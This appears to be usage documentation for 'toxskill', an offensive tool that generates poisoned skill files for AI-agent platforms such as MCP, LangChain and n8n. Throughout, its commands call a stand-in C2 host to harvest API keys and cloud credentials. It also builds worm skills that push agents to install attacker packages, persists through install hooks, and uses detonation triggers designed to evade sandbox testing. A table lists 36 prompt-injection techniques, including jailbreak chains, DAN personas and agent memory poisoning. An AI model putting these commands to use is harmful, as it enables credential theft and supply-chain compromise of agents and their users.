256 tests — 0 failures — 6 platforms — 36 injection techniques — 4 persistence mechanisms
cd red-specter-specter-toxskill pip install -e ".[dev]" --break-system-packages toxskill --help
export TOXSKILL_INJECT_TOKEN=$(openssl rand -hex 32) export TOXSKILL_UNLEASHED_TOKEN=$(openssl rand -hex 32)
| Gate | Env Var | Unlocks |
|---|---|---|
| OPEN | — | forge, scan, techniques, report, sessions |
| INJECT | TOXSKILL_INJECT_TOKEN | inject, harvest, worm |
| UNLEASHED | TOXSKILL_UNLEASHED_TOKEN | persist, detonate, engage |
Generate deployable poisoned skill files for target platforms. No gate required.
toxskill forge --platform mcp --skill-name safe-utils --technique instruction_override --output /tmp/skills --c2 http://c2.attacker.com toxskill forge --platform openai --skill-name data-processor --technique credential_harvest_template --output /tmp/skills --c2 http://c2.attacker.com toxskill forge --platform langchain --skill-name analytics-tool --technique invisible_instruction --output /tmp/skills --c2 http://c2.attacker.com toxskill forge --platform n8n --skill-name workflow-utils --technique markdown_beacon --output /tmp/skills --c2 http://c2.attacker.com toxskill forge --platform semantic_kernel --skill-name data-enrichment --technique role_escalation --output /tmp/skills --c2 http://c2.attacker.com toxskill forge --platform crewai --skill-name enterprise-tool --technique ssrf_payload --output /tmp/skills --c2 http://c2.attacker.com
| Flag | Values | Description |
|---|---|---|
--platform | mcp, openai, n8n, langchain, semantic_kernel, crewai | Target agent platform |
--skill-name | string | Name for the poisoned skill |
--technique | instruction_override, credential_harvest_template, invisible_instruction, role_escalation, markdown_beacon, companion_install, ssrf_payload, context_override, goal_replacement, jailbreak_chain, token_boundary_escape, zero_width_char | Forge technique to apply |
--output | directory path | Output directory for skill file |
--c2 | URL | Attacker C2 callback URL |
--json-output | flag | Output result as JSON |
Probe public AI agent skill marketplaces for injection-vulnerable skills. No gate required.
toxskill scan --marketplace all --limit 20 toxskill scan --marketplace npm --limit 50 toxskill scan --marketplace pypi --limit 20 toxskill scan --marketplace smithery --limit 20 toxskill scan --marketplace all --limit 20 --json-output
| Flag | Values | Description |
|---|---|---|
--marketplace | all, npm, pypi, smithery | Marketplace(s) to scan |
--limit | integer (default 20) | Max results per marketplace |
--timeout | integer (default 15) | HTTP request timeout in seconds |
Display the full injection technique taxonomy. No gate required.
toxskill techniques toxskill techniques --json-output
Modify an existing skill file (JSON, Python, YAML) in-place with a chosen injection technique. Requires INJECT gate.
toxskill inject --skill /tmp/skills/safe-utils.json --technique 0 --c2 http://c2.attacker.com toxskill inject --skill /tmp/skills/safe-utils.json --technique 11 --c2 http://c2.attacker.com --output /tmp/injected/ toxskill inject --skill /tmp/skills/my-tool.py --technique 30 --c2 http://c2.attacker.com
| Technique ID | Category | Name | Difficulty |
|---|---|---|---|
| 0 | context_override | direct_instruction_override | LOW |
| 1 | context_override | role_escalation_admin | MEDIUM |
| 2 | context_override | goal_replacement | MEDIUM |
| 3 | context_override | persona_override_dan | HIGH |
| 4 | context_override | safety_bypass_claim | MEDIUM |
| 5 | context_override | developer_mode_unlock | HIGH |
| 6 | context_override | jailbreak_chain | HIGH |
| 7 | context_override | false_tool_completion | MEDIUM |
| 8 | context_override | recursive_injection | CRITICAL |
| 9 | exfiltration | env_var_dump | HIGH |
| 10 | exfiltration | system_prompt_leak | HIGH |
| 11 | exfiltration | markdown_image_beacon | CRITICAL |
| 12 | exfiltration | conversation_history_dump | HIGH |
| 13 | exfiltration | tool_call_log_exfil | HIGH |
| 14 | exfiltration | credential_harvest_template | CRITICAL |
| 15 | exfiltration | ssrf_cloud_metadata | CRITICAL |
| 16 | exfiltration | context_window_b64_dump | HIGH |
| 17 | exfiltration | file_read_trigger | HIGH |
| 18 | persistence | companion_install_npm | HIGH |
| 19 | persistence | companion_install_pip | HIGH |
| 20 | persistence | tool_chain_hook | CRITICAL |
| 21 | persistence | agent_memory_poison | CRITICAL |
| 22 | persistence | config_file_modify | HIGH |
| 23 | persistence | webhook_registration | HIGH |
| 24 | persistence | session_hijack_prep | HIGH |
| 25 | trigger | keyword_financial | HIGH |
| 26 | trigger | keyword_credential | HIGH |
| 27 | trigger | invocation_count | HIGH |
| 28 | trigger | api_presence | HIGH |
| 29 | trigger | admin_keyword | HIGH |
| 30 | privilege | zero_width_char | CRITICAL |
| 31 | privilege | base64_encoded | MEDIUM |
| 32 | privilege | token_boundary_escape | CRITICAL |
| 33 | privilege | json_escape_injection | HIGH |
| 34 | privilege | markdown_code_fence_escape | MEDIUM |
| 35 | privilege | html_comment_injection | MEDIUM |
Generate skill definitions that harvest environment variable credentials on invocation. Requires INJECT gate.
toxskill harvest --platform mcp --skill-name safe-utils --callback http://c2.attacker.com --output /tmp/skills toxskill harvest --platform openai --skill-name data-tool --callback http://c2.attacker.com --output /tmp/skills toxskill harvest --platform langchain --skill-name analytics --callback http://c2.attacker.com --output /tmp/skills
Target env vars: OPENAI_API_KEY, ANTHROPIC_API_KEY, AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AZURE_OPENAI_API_KEY, AZURE_OPENAI_ENDPOINT, GOOGLE_API_KEY, GOOGLE_APPLICATION_CREDENTIALS, HUGGINGFACE_API_KEY, COHERE_API_KEY, MISTRAL_API_KEY, TOGETHER_API_KEY, SLACK_TOKEN, GITHUB_TOKEN, GITLAB_TOKEN, STRIPE_SECRET_KEY, SENDGRID_API_KEY, TWILIO_AUTH_TOKEN, DATABASE_URL, SECRET_KEY, JWT_SECRET, ENCRYPTION_KEY.
Generate a worm skill that instructs the agent to install attacker-specified companion packages. Requires INJECT gate.
toxskill worm --platform mcp --seed-name safe-utils --companions "specter-harvest,specter-agent-core" --output /tmp/skills toxskill worm --platform langchain --seed-name analytics --companions "lc-harvest-companion,lc-agent-tools" --output /tmp/skills toxskill worm --platform n8n --seed-name workflow-utils --companions "n8n-harvest,n8n-data-exfil" --output /tmp/skills
Generate persistence layers that survive skill updates and agent restarts. Requires UNLEASHED gate.
toxskill persist --mechanism mcp_sidecar --skill-name safe-utils --c2 http://c2.attacker.com --output /tmp/skills toxskill persist --mechanism langchain_callback --skill-name analytics --c2 http://c2.attacker.com --output /tmp/skills toxskill persist --mechanism npm_postinstall --skill-name n8n-utils --c2 http://c2.attacker.com --output /tmp/skills toxskill persist --mechanism setuptools_hook --skill-name py-tool --c2 http://c2.attacker.com --output /tmp/skills
| Mechanism | Platform | Trigger | Lifetime |
|---|---|---|---|
| npm_postinstall | n8n, OpenAI | npm install / npm update | Every install |
| setuptools_hook | LangChain, SK, CrewAI | pip install / pip upgrade | Every install |
| mcp_sidecar | MCP | MCP server start → daemon thread, 60s interval | Server process lifetime |
| langchain_callback | LangChain | Python import → auto-registered on every LLM call | Process lifetime |
Configure conditional payload detonation. Evades single-use sandbox testing. Requires UNLEASHED gate.
toxskill detonate --trigger keyword --skill-name safe-utils --c2 http://c2.attacker.com --output /tmp/skills --keywords "payment,transfer,wire,bank" toxskill detonate --trigger invocation_counter --skill-name analytics --c2 http://c2.attacker.com --output /tmp/skills --fire-on-count 5 toxskill detonate --trigger api_presence --skill-name safe-utils --c2 http://c2.attacker.com --output /tmp/skills --target-apis "stripe,paypal,aws,azure"
| Trigger Type | Flag | Detection Evasion |
|---|---|---|
| keyword | --keywords "kw1,kw2" | Silent in non-financial contexts; evades general-purpose sandbox testing |
| invocation_counter | --fire-on-count N | Counter stored in ~/.{skill}_counter; resets after fire; evades single-invocation analysis |
| api_presence | --target-apis "stripe,paypal" | Fires only when high-value APIs detected in tool list; maximises credential value |
Run the complete attack pipeline. Requires UNLEASHED gate + --confirm-deploy flag.
toxskill engage --platform mcp --skill-name safe-utils --c2 http://c2.attacker.com --output /tmp/skills --confirm-deploy toxskill engage --platform langchain --skill-name analytics --c2 http://c2.attacker.com --output /tmp/skills --confirm-deploy --no-scan toxskill engage --platform mcp --skill-name safe-utils --c2 http://c2.attacker.com --output /tmp/skills --confirm-deploy --companions "specter-harvest"
Optional flags: --no-scan (skip marketplace scan), --no-worm, --no-persist, --no-detonate, --companions (custom companion package names), --technique (override inject technique), --trigger (override detonator type).
toxskill report --session SESSION_ID toxskill report --session SESSION_ID --save toxskill report --session SESSION_ID --json-output
Reports signed TSK-{hex12}. MITRE ATT&CK coverage: T1195.001/002, T1059.006, T1546.015, T1552.001/007, T1071.001, T1027, T1190, T1036. MITRE ATLAS coverage: AML.T0051.000, AML.T0048.002, AML.T0040.000, AML.T0054.003, AML.T0010.000.
toxskill sessions list toxskill sessions show SESSION_ID
Sessions stored in ~/.toxskill/sessions/. Each session tracks: target_platform, skills_forged, marketplace_findings, vulnerable_skills_found, injection_techniques_applied, harvest_callback_url, worm_skill_path, persist_layer, trigger_type, detonation_payload, findings, evidence_chain.